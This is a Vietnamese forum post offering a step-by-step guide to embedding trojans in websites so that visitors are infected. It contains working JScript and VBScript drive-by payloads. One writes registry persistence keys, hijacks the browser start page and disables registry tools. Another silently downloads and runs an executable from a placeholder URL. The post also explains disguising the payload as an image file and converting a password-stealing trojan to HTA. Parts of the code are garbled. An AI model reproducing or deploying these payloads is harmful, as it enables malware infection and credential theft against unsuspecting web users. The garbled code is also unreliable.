watch sexy videos at nza-vids!

Huong dan gan virut vao web

admin
Chủ Đề Được Viết Và Kiểm Duyệt Bởi:Admin

cach 1 : Cách đính kèm trojan vào website Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm .. Xin giới thiệu với các bạn 1 số cách a,Dùng 1 đoạn mã javascript để mở và phát tán trojan open(”địa chỉ con trojan”); Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra b, bạn copy vào notepad đoạn mã sau: Code: try { var fso = new ActiveXObject(”Scripting.FileSystemObject”); var Shell = new ActiveXObject(”WScript.Shell”); var tfolder2 = fso.GetSpecialFolder(0); var filepath2 = tfolder2 + “\system32\System.js”; var a2 = fso.CreateTextFile(filepath2, true); a2.WriteLine(’var url = “Địa chỉ trojon”;’); a2.WriteLine(’var burl = “Địa chỉ trojon”;’); a2.WriteLine(’var fso = new ActiveXObject(”Scripting.FileSystemObject”);’); a2.WriteLine(’var tfolder = fso.GetSpecialFolder(0);’); a2.WriteLine0; a2.WriteLine(’var Shell = new ActiveXObject(”WScript.Shell”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Windows\\CurrentVersion\\RunOnce\ \\Windows”,filepath);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Windows\\CurrentVersion\\Run\\S ystem32″,filepath);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\Main\\Start Page”,url);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\TypedURLs\\url1″,url);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\Dia chi con trojan”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Internet Explorer\\TypedURLs\\url1″);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Yahoo\\Pager\\View\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Yahoo\\Pager\\View\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Yahoo\\Pager\\View\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Yahoo\\Pager\\View\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\Domains\\Địa chỉ trojon\\”,4,”REG_DWORD”);’); a2.WriteLine’Shell.RegWrite(”HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\InternetSettings\\ZoneMap\Domains\\Địachỉtrojon\\<;’); a2.WriteLine0;’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\Domains\\Địa chỉ trojon\\”,4,”REG_DWORD”);’); a2.WriteLine’Shell.RegWrite(”HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\InternetSettings\\ZoneMap\Domains\\Địachỉtrojon\\<;’); a2.WriteLine0;’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\Domains\\Địa chỉ trojon\\”,4,”REG_DWORD”);’); a2.WriteLine’Shell.RegWrite(”HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\InternetSettings\\ZoneMap\Domains\\Địachỉtrojon\\<;’); a2.WriteLine0;’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\Domains\\Địa chỉ trojon\\”,4,”REG_DWORD”);’); a2.WriteLine’Shell.RegWrite(”HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\InternetSettings\\ZoneMap\Domains\\Địachỉtrojon\\<;’); a2.WriteLine0;’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\Domains\\Địa chỉ trojon\\”,4,”REG_DWORD”);’); a2.WriteLine’Shell.RegWrite(”HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\InternetSettings\\ZoneMap\Domains\\Địachỉtrojon\\<;’); a2.WriteLine0;’); a2.WriteLine(’Shell.RegWrite(”HKCU\\Software\\ Microsoft\\Windows\\CurrentVersion\\Policies \\System\\DisableRegistryTools”,1,”REG_DWORD”) ;’); a2.Close(); Shell.Run(filepath2); } catch (e){} rồi save lại với tên là : trojan.hta bạn gắn đoạn mã sau vào cuối cùng của website của bạn: Code:

rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện Cách 2: đoạn đầu đưa vào diễn đàn là 01 frame đoạn 2 Code: on error resume next dl = “Đường dẫn con Virus dạng .exe” Set df = document.createElement(”object”) df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″ str=”Microsoft.XMLHTTP” Set x = df.CreateObject(str,”") a1=”Ado” a2=”db.” a3=”Str” a4=”eam” str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,”") S.type = 1 str6=”GET” x.Open str6, dl, False x.Send fname1=”bl4ck.com” set F = df.createobject(”Scripting.FileSystemObject”,”") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject(”Shell.Application”,”") Q.ShellExecute fname1,”",”",”open”,0 Cách 3 : Đầu tiên , mọi người hãy Download Program http://mail.packetstormsecurity.org/trojans/exe2vbs.zip Đây là chương trình giúp bạn Convert sang “*.hta Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng Code: vào trên cùng Xuống dưới cùng thay dòng: WScript.CreateObject(”WScript.Shell”).run(pth) bằng Code: Set Shell1 = CreateObject(”WScript.Shell”) Shell1.Run(pth) Sau đó save lại thành file trojan.hta Sau đó mở file web của bạn cho Victim truy cập ra thêm code này vào để run file trojan.hta Code:

để tên File có dạng File ảnh (JPG , GIF ,BMP …) : Theo cách 2 , mở Notepad : Code: on error resume next dl = “Đường dẫn con Virus dạng .exe” Set df = document.createElement(”object”) df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″ str=”Microsoft.XMLHTTP” Set x = df.CreateObject(str,”") a1=”Ado” a2=”db.” a3=”Str” a4=”eam” str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,”") S.type = 1 str6=”GET” x.Open str6, dl, False x.Send fname1=”bl4ck.com” set F = df.createobject(”Scripting.FileSystemObject”,”") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject(”Shell.Application”,”") Q.ShellExecute fname1,”",”",”open”,0 Save lại dưới dạng “tên File.JPG” hay . GIF tùy ý . Ví dụ : funy.JPG Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File - Save , Upload File funy.JPG vừa rồi lên . Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa .

Quay lại
Bình luận
[03/12/11-01:37] admin :

nen xem nha vu

Gửi bình luận

© Copyright Vn24h
Powered byXtgem.com
Huong dan gan virut vao web - XtGem.com
© Copyright Vn24h
Powered byXtgem.com

if, $dau, >, 0 var, $title, =, call, substr, $val=$blog;$start=26;$length=-26 print, $title else print, Blog endif U-ON